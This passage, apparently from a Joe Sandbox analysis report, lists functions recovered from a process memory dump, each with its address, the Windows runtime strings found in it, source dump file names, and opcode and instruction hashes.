                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                      • API String ID: 0-2547482624
                      • Opcode ID: 9194c7220f2c715bd620de85860a49d66fd70cf6d00794c449dc2370aca40808
                      • Instruction ID: 925d3c4258a1115b4f2cac76fa5e6e016425c75406ea8fc8e4ba842335c61ab0
                      • Opcode Fuzzy Hash: 9194c7220f2c715bd620de85860a49d66fd70cf6d00794c449dc2370aca40808
                      • Instruction Fuzzy Hash: D9518D71504742CFD725DF68C544AA7FBE4AFC4304F20883EFAAA87286E7709545CB92
                      Function 0173A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                      Download Yara Rule
                      Strings
                      • RtlpResUltimateFallbackInfo Enter, xrefs: 0173A2FB
                      • RtlpResUltimateFallbackInfo Exit, xrefs: 0173A309
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                      • API String ID: 0-2876891731
                      • Opcode ID: 2961fee78710ec4f6b442b983a91facbf4368796d0c458d95690eed551b022d5
                      • Instruction ID: 9ad592bc23bf515a950679db2fe9e1d2eaad9921acba566e08de4a9dcceaf8f8
                      • Opcode Fuzzy Hash: 2961fee78710ec4f6b442b983a91facbf4368796d0c458d95690eed551b022d5
                      • Instruction Fuzzy Hash: E341DF30A04659EBDB12DF59D885BAEFBF4FF84700F2440A9E944DB2A2E3B5D940CB40
                      Function 0176A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID: Cleanup Group$Threadpool!
                      • API String ID: 2994545307-4008356553
                      • Opcode ID: e8660e0640eeb34ce4fcc688838d023b2d39fdf112347bb5a337e8be003d47c4
                      • Instruction ID: 94d41e256acf1e9f9d52e64fe8c22cc2f5bb97c94cfcb3b8883115cab71ff924
                      • Opcode Fuzzy Hash: e8660e0640eeb34ce4fcc688838d023b2d39fdf112347bb5a337e8be003d47c4
                      • Instruction Fuzzy Hash: 1E01DCB2250740AFD322DF24CD49B26B7E8EB84B25F018939AA58D7190E334E908CB46
                      Function 0173C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: MUI
                      • API String ID: 0-1339004836
                      • Opcode ID: 8bde832d3124899d8f827d4b9ce860dfe92d2d2cd1ef45ab9ae92c0f262c9c89
                      • Instruction ID: 98e2bc9877f4157735fba3fe4603c05c2519842918f8e03eb5a55f7c98dfa7a6
                      • Opcode Fuzzy Hash: 8bde832d3124899d8f827d4b9ce860dfe92d2d2cd1ef45ab9ae92c0f262c9c89
                      • Instruction Fuzzy Hash: 9F827C75E002198FEB25CFA9C884BEDFBB5BF88710F14816AE959AB352D7309D41CB50
                      Function 017B6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID: 0-3916222277
                      • Opcode ID: 113d4a2981c32de9849bc781cee997c74d795d33cb72ee5497a50c1c5f7bc3b6
                      • Instruction ID: 942240f5964a0452fd7ccb9bb6818450776fa06c6d4d50ba8c45dfdc091eb0b8
                      • Opcode Fuzzy Hash: 113d4a2981c32de9849bc781cee997c74d795d33cb72ee5497a50c1c5f7bc3b6
                      • Instruction Fuzzy Hash: 5A913F72941219ABEB21DF95CD85FEEBBB8EF18B50F104065F700AB195D774AD04CBA0
                      Function 017DE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID: 0-3916222277
                      • Opcode ID: 5e79269e68db5268452013829e9125aae4bf38d28ab90950f0b3d8d533c7197a
                      • Instruction ID: 579935b48517fdfd5a111b931667b8c75318285529d44f2d30c3bb5e3c0aac9c
                      • Opcode Fuzzy Hash: 5e79269e68db5268452013829e9125aae4bf38d28ab90950f0b3d8d533c7197a
                      • Instruction Fuzzy Hash: 9E918E31A00609ABDB23AFA5DC88FAFFB79EF45750F100029F505AB250EF75A901DB91
                      Function 0176A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: GlobalTags
                      • API String ID: 0-1106856819
                      • Opcode ID: a3d8d5d5756939a59cfd8eaec647d25f88b803cfa28ecf9864ea4fb24a4a95d2
                      • Instruction ID: 665d713f20599f96e972237f07e1443a89caf70a62e6af5de185d90970532102
                      • Opcode Fuzzy Hash: a3d8d5d5756939a59cfd8eaec647d25f88b803cfa28ecf9864ea4fb24a4a95d2
                      • Instruction Fuzzy Hash: 1E717DB5E0021ACFDF29CF9CC590AADFBB5BF88710F58826AF905A7245E7319941CB50
                      Function 017D4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: .mui
                      • API String ID: 0-1199573805
                      • Opcode ID: a176b7c2b2ce7ac7cac99c1bbee013052980787071c44e337fc876ca2239bc2d
                      • Instruction ID: a8701577e8ff937f3d86d846a4dc3bb80392304b95da049739231a5725e2672d
                      • Opcode Fuzzy Hash: a176b7c2b2ce7ac7cac99c1bbee013052980787071c44e337fc876ca2239bc2d
                      • Instruction Fuzzy Hash: 1251B072D0022E9BDF11DF99C844AAEFBB4AF58A40F05416AEA12BB654D7348D01CFE5
                      Function 0174E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: EXT-
                      • API String ID: 0-1948896318
                      • Opcode ID: 43691f55e92c828fd48ab055d9d7d6db24bd9b1ce542f0b78f600f66831a005e
                      • Instruction ID: 0e951e7a80d8fd499501ddbcedfa983ec852557af33c88c05e9ae6665bfda8e7
                      • Opcode Fuzzy Hash: 43691f55e92c828fd48ab055d9d7d6db24bd9b1ce542f0b78f600f66831a005e
                      • Instruction Fuzzy Hash: 3F4160725083129BD712DB79C884B6BF7D8BF88724F44096DF684D7180EB78D904C796
                      Function 017AC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: BinaryHash
                      • API String ID: 0-2202222882
                      • Opcode ID: 1ac719cfb79e52d52f37821250bc5fdb4f7242cea298057c6704217816931208
                      • Instruction ID: 261303606a7ea779116a457aadbd4d6e4a2e21837db19edacb768875f5fe2dc3
                      • Opcode Fuzzy Hash: 1ac719cfb79e52d52f37821250bc5fdb4f7242cea298057c6704217816931208
                      • Instruction Fuzzy Hash: BA4142B1D4112DAADF22DB50CC84FDEF77CAB44724F4046A5EB18AB144DB709E898FA4
                      Function 017C6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: #
                      • API String ID: 0-1885708031
                      • Opcode ID: aea5ae35cd8c6de1448e2d00764fb17fe4a3be0add2e5846b203fd20dce003e7
                      • Instruction ID: 5aea71e3ab0ceede9b28aae0797e0be0c0c445a83b513b4a927168ba590fb352
                      • Opcode Fuzzy Hash: aea5ae35cd8c6de1448e2d00764fb17fe4a3be0add2e5846b203fd20dce003e7
                      • Instruction Fuzzy Hash: 8831E531A006199BEB32DF69C894BEEFBA8DF05B04F14406CF951AB382D775E905CB50
                      Function 017ACA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: BinaryName
                      • API String ID: 0-215506332
                      • Opcode ID: 5e9fd23d939ee0d2690a42bc5caf7d91e886ec5d216678d11ec3c88e15b1c075
                      • Instruction ID: 6abd71c51b76ae5f4d8a649d0693ea794fa8b57bbf2cfca12c060473c0ba101f
                      • Opcode Fuzzy Hash: 5e9fd23d939ee0d2690a42bc5caf7d91e886ec5d216678d11ec3c88e15b1c075
                      • Instruction Fuzzy Hash: 07310336900519BFEB16DB58C855EBFFB74EBC0720F414269AA15AB250D7319E00EBE0
                      Function 017B892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                      Download Yara Rule
                      Strings
                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 017B895E
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                      • API String ID: 0-702105204
                      • Opcode ID: 8e5acaa86775fb618eeadd03925d3d3546774a8fbec4fd02e72ab1d526e44683
                      • Instruction ID: a135b3295bc0dc0815c63719655cd4f293c75b9d6a13664355e7d068826dcb57
                      • Opcode Fuzzy Hash: 8e5acaa86775fb618eeadd03925d3d3546774a8fbec4fd02e72ab1d526e44683
                      • Instruction Fuzzy Hash: 9501F7712402219BEB325E59C8C8BE6FB69EF82794B04001DF7814A155CB20A881CB93
                      Function 017D2000 Relevance: .8, Instructions: 757COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 24f2d03c8bbf73275ea39cf4687256d1e031739f28e054620fc31f9765eed83f
                      • Instruction ID: 933612857a54bab6abedf9cf276b4ef744cdf47fb5c2cc379f091f905bda20ea
                      • Opcode Fuzzy Hash: 24f2d03c8bbf73275ea39cf4687256d1e031739f28e054620fc31f9765eed83f
                      • Instruction Fuzzy Hash: 6942E2326083499FD725CF68C891A6BFBF5BF88300F08492DFA9697252D771D846CB52
                      Function 017C8158 Relevance: .6, Instructions: 617COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c9174d14a469ad3d3ed48350a9e67d06d3d317c07cd54a7c365d4841cc2bb5ee
                      • Instruction ID: 7c2d4208465756154ffba641a623bc35bb6bc098b5a735504c9b35fafb055755
                      • Opcode Fuzzy Hash: c9174d14a469ad3d3ed48350a9e67d06d3d317c07cd54a7c365d4841cc2bb5ee
                      • Instruction Fuzzy Hash: 0D425C75A002199FEB25CF69C881BADFBF5BF48700F18819DE949EB242D7349981CF51
                      Function 01742840 Relevance: .6, Instructions: 605COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e5e766ebfddd0a1534338ee0207437e50cd48f452edaa7da3e2d7dfc5c11ecc4
                      • Instruction ID: 66589c169c8727a77f82b721fc62b30e085d59e9649f6ec9bcd76af6eb6b88f4
                      • Opcode Fuzzy Hash: e5e766ebfddd0a1534338ee0207437e50cd48f452edaa7da3e2d7dfc5c11ecc4
                      • Instruction Fuzzy Hash: F932DE70A007558BEF25CF69D848BBEFBF2BF84304F24421DE5869B285D735A949CB90
                      Function 017DA118 Relevance: .6, Instructions: 591COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 549d65f22a02044a1985e64a04e14181249f77c8eb7b668ab6333b4c5ee16210
                      • Instruction ID: dadd1cba5cd9cda1057b21abe9409ff4e1e65967dff9250845d7b9a5c47c31a1
                      • Opcode Fuzzy Hash: 549d65f22a02044a1985e64a04e14181249f77c8eb7b668ab6333b4c5ee16210
                      • Instruction Fuzzy Hash: 7122CD70204669CBEB25CF2DC094772FBF1BF44300F18849AE9968F286E775E592CB61
                      Function 01736A50 Relevance: .5, Instructions: 548COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 186ccf1a6d91dd0cf48b0e53a8f456a705665e57688e81da2478aa8ce23e0f71
                      • Instruction ID: 09fc6ce793976412a8862f138d6b48b43557d3484786f28b51246b7e2cf195cf
                      • Opcode Fuzzy Hash: 186ccf1a6d91dd0cf48b0e53a8f456a705665e57688e81da2478aa8ce23e0f71
                      • Instruction Fuzzy Hash: 0132AD71A04205DFDB25CF68D880BAAFBF1FF88310F2485A9E955AB392D730E955CB50
                      Function 01754A35 Relevance: .4, Instructions: 423COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                      • Instruction ID: 11197c980730d2b751b00dd656881e645f8f4769a2f60e2f12b7dee701890515
                      • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                      • Instruction Fuzzy Hash: 63F16F71E0021A9BDF55CFA9D584BAEFBF5AF48710F048169ED06AB344E7B4D881CB50
                      Function 017C892B Relevance: .4, Instructions: 386COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e6fe770e43500436b7e8e1c6c2788561f72e05e20e75e724ba645ca5b7ae0f55
                      • Instruction ID: 5954953d70328224d2e1d7e7338d3eb90d1b690e208bafc1b7672f095ebf36b6
                      • Opcode Fuzzy Hash: e6fe770e43500436b7e8e1c6c2788561f72e05e20e75e724ba645ca5b7ae0f55
                      • Instruction Fuzzy Hash: C6D1F071A0061A9BDF15CF68C841BFEF7F1AF88B04F1881AED955A7241E735EA01CB61
                      Function 017365D0 Relevance: .4, Instructions: 383COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 37a044da7f0c6a1b5206bf75f25ad43d1a31374cba0f675be01eef452c0d78bd
                      • Instruction ID: 2c1cd8610147619a6a187d9a0a7e2ad03f0f7378f30f14f90252e35bee38b990
                      • Opcode Fuzzy Hash: 37a044da7f0c6a1b5206bf75f25ad43d1a31374cba0f675be01eef452c0d78bd
                      • Instruction Fuzzy Hash: ABE16971608342DFC715CF28C094A6AFBE0BF89314F55896DF99987352EB31EA05CB92
                      Function 01728397 Relevance: .4, Instructions: 380COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3033275775d94159b1d8db0df20ca384b60dd5c8d236175385579ab813142733
                      • Instruction ID: a357379d289031f00c828a804af09275a0fee60b74d20b2201f5473b7246aa27
                      • Opcode Fuzzy Hash: 3033275775d94159b1d8db0df20ca384b60dd5c8d236175385579ab813142733
                      • Instruction Fuzzy Hash: C4D12471B402268BCB14DF69C880ABAF7F1FF54308F14422DE912DB281E735EA52CB61
                      Function 017B8243 Relevance: .3, Instructions: 322COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                      • Instruction ID: 878f6c99cafdf162594425a73908b1746ce8101904812e4e2c01fbb9bb1503d4
                      • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                      • Instruction Fuzzy Hash: E3B17C75A00609AFDB24DF99C984BEBFBBDBF84304F10446DAA02A7794DB34E945CB11
                      Function 01740535 Relevance: .3, Instructions: 300COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                      • Instruction ID: b54d83913c0acdba1eca3e0ba1e4110fc76c8042d8964e759db2cf53cc5f2b70
                      • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                      • Instruction Fuzzy Hash: DFB1F731600646AFDF26DB68C954BBEFBF6EF48300F280199E65697285D730ED45CB90
                      Function 017383C0 Relevance: .3, Instructions: 281COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 07f454243e4709e9aa8eea7a1ea73605b77856405a27a68f7c556ca17f366341
                      • Instruction ID: f5f0f5709d011c1327660fe17c4a1da357a19effd7f4617dca3eea148ee47973
                      • Opcode Fuzzy Hash: 07f454243e4709e9aa8eea7a1ea73605b77856405a27a68f7c556ca17f366341
                      • Instruction Fuzzy Hash: 9BC137741083818FEB64CF19C494BAAF7E5BF88304F544A6DE98987391D774EA48CF92
                      Function 0172C427 Relevance: .3, Instructions: 280COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a78c86c36fa352a6bc5ed8541deed80f9aa7014c28c12b10138a4f120d6f38f3
                      • Instruction ID: 1a890e10d7ae7b868d79a466dcc314bfde5ebadfa0e67887fac1ad249cf27dbd
                      • Opcode Fuzzy Hash: a78c86c36fa352a6bc5ed8541deed80f9aa7014c28c12b10138a4f120d6f38f3
                      • Instruction Fuzzy Hash: 00B17070A002668BDB75DF69C880BADF7B1EF54700F2485EAD50AE7245EB70DD86CB21
                      Function 0175E5E7 Relevance: .3, Instructions: 278COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fa940caca15313f236dcba695bbd30dda6a3ecf92a2793fb859b1978b48c84f4
                      • Instruction ID: 22200c4d9c7d91badbc864b7f3649d3894927b63049db704fb01ac2018285f50
                      • Opcode Fuzzy Hash: fa940caca15313f236dcba695bbd30dda6a3ecf92a2793fb859b1978b48c84f4
                      • Instruction Fuzzy Hash: 0CA13531E00659AFEF22DF58D848BAEFFB4EB01754F144161EE50AB291DBB49E44CB90
                      Function 01770185 Relevance: .3, Instructions: 276COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4bc23c606a3d059d7f039a67c3dd80c3a322e503a007e49fecdfc210562323ab
                      • Instruction ID: 87ad28ca5e0b3cf6bfdf7157e9486b6137bd61ff950508f0d2ca4edf1088d241
                      • Opcode Fuzzy Hash: 4bc23c606a3d059d7f039a67c3dd80c3a322e503a007e49fecdfc210562323ab
                      • Instruction Fuzzy Hash: FBA1AE71B0061ADBDF25CF69C990BAAF7F1FF56318F104129EA4597282EB34E911CB90
                      Function 01804500 Relevance: .3, Instructions: 275COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 53cd26e53e7d16ab0b39d359e75da08a52af6bb856c459e38d8e9c091abbd565
                      • Instruction ID: 7111ecdb8ca8ce08bd7056a6b660a96df40f2d6ec77fe1cdf2d86f4ac66976ca
                      • Opcode Fuzzy Hash: 53cd26e53e7d16ab0b39d359e75da08a52af6bb856c459e38d8e9c091abbd565
                      • Instruction Fuzzy Hash: EAA1CC72A406169FD762DF18CD84B2ABBE9FF48304F154928F689DB691D334EE00CB91
                      Function 01802B57 Relevance: .3, Instructions: 266COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                      • Instruction ID: 0f71fd3faf15c8bfd992ba4acf92db8cba8a34039a172bea1f32ab5a1972ce85
                      • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                      • Instruction Fuzzy Hash: B3B13871E0061EDFDF66CFA9C884AADB7B6BF48310F148129E914E7295D770AE41CB90
                      Function 017B60E0 Relevance: .3, Instructions: 264COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e2b7c6e8bf27dbc3934245016117a1ec0730b1876f22cd47ee730bccd7004173
                      • Instruction ID: a523a6030ad6e77bb762f385853046e46b91744d8c496acee737b97bb2a75b22
                      • Opcode Fuzzy Hash: e2b7c6e8bf27dbc3934245016117a1ec0730b1876f22cd47ee730bccd7004173
                      • Instruction Fuzzy Hash: B4919E71E0521AAFDB15CFA8D8C4BEEFBB5AB48710F154169FB11AB241D734E9009BA0
                      Function 0174E3F0 Relevance: .3, Instructions: 261COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 12ad3a59a1b3e1e4a44f3ee12de71ac19b78669f6fd18194f071d9f6d0cb86ee
                      • Instruction ID: f1d7da1cae80a02c6168199de121c01864480c26f902bfd81bea54c289e5e5cb
                      • Opcode Fuzzy Hash: 12ad3a59a1b3e1e4a44f3ee12de71ac19b78669f6fd18194f071d9f6d0cb86ee
                      • Instruction Fuzzy Hash: 67911331A00612CBEB25DB6CD884B79FBA1FF94724F2540A9EE059B345FB38D941CB91
                      Function 01786ACC Relevance: .2, Instructions: 226COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cb371ad99f037dd2403354b882bd701922bf6b6662b00ef64b1b685b24de08ba
                      • Instruction ID: f0b0d61c88f7dded8689e59ab2b5869ff542fa272a84544cbd8ebe0852cd2d1a
                      • Opcode Fuzzy Hash: cb371ad99f037dd2403354b882bd701922bf6b6662b00ef64b1b685b24de08ba
                      • Instruction Fuzzy Hash: 38818071A00616ABDB25DFA9C840ABEFBF9FB48700F14852EF555E7640E734E940CBA4
                      Function 017FAB40 Relevance: .2, Instructions: 222COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_1700000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                      • Instruction ID: 887fdb5d85dfeb2d46ee3cdf3589d5ad9a9b12f616b5a7004e47a36f6f2491ae
                      • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                      • Instruction Fuzzy Hash: 49816131A0020A9FDF19DF98C894AAFFBB6BF84310F14856DDA1A9B385D734E941CB50
